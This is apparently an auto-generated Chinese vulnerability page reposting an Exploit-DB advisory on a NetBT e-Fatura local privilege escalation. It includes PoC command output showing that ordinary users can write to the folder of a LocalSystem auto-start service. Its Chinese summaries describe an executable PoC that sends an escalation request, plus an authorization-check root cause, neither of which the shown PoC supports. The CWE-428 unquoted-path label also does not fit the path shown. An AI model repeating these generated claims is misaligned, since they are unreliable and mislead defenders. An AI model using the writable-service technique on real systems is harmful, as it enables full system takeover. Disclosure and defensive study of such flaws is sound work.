[local] NetBT e-Fatura - Privilege Escalation
CVE-2025-14018
NetBT e-Fatura本地权限提升漏洞,允许低权限用户获取管理员权限。
High · CVSS 7.8📋 漏洞基础信息
| CVE | CVE-2025-14018 |
|---|---|
| 漏洞类型 | 本地权限提升 |
| 受影响版本 | NetBT e-Fatura(所有版本) |
| 危害等级 | High · CVSS 7.8 |
| 发布日期 | 2026-04-10 |
| 提交者 | Seccops |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
应用程序以高权限运行服务,未对本地用户调用进行充分授权检查,允许低权限用户通过特定操作提升权限。
🎯 攻击场景
1. 攻击者已获取目标系统的低权限访问。2. 攻击者执行漏洞利用程序,通过NetBT e-Fatura服务以高权限执行命令或操作。3. 成功后可获得系统管理员级控制权。
💥 漏洞影响
攻击者可利用该漏洞将权限提升至管理员级别,完全控制受影响系统,导致机密性、完整性和可用性受损。
⚔️ 原始 PoC
PoC包含一个可执行文件,该文件利用NetBT e-Fatura服务中的漏洞,以高权限运行指定命令或执行提权操作。具体关键步骤包括:定位服务、发送提权请求、获得高权限shell。
# Discovery Date: 2025-10-03
# Vulnerability Type: CWE-428 Unquoted Search Path or Element
Note: Thanks "Levent Sungu" for providing the testing environment.
====================
Description & Impact
====================
This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system.
================
Proof of Concept
================
C:\Users\efatura>sc qc InboxProcessor
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: InboxProcessor
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : InboxProcessor
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\inetpub\wwwroot\InboxProcessor
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators🔬 深度技术分析
PoC包含一个可执行文件,该文件利用NetBT e-Fatura服务中的漏洞,以高权限运行指定命令或执行提权操作。具体关键步骤包括:定位服务、发送提权请求、获得高权限shell。
🛡️ 修复建议
厂商未发布补丁。临时缓解措施:限制本地用户对NetBT e-Fatura服务的访问权限,或禁用该服务。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-09 18:10 | 来源: Exploit-DB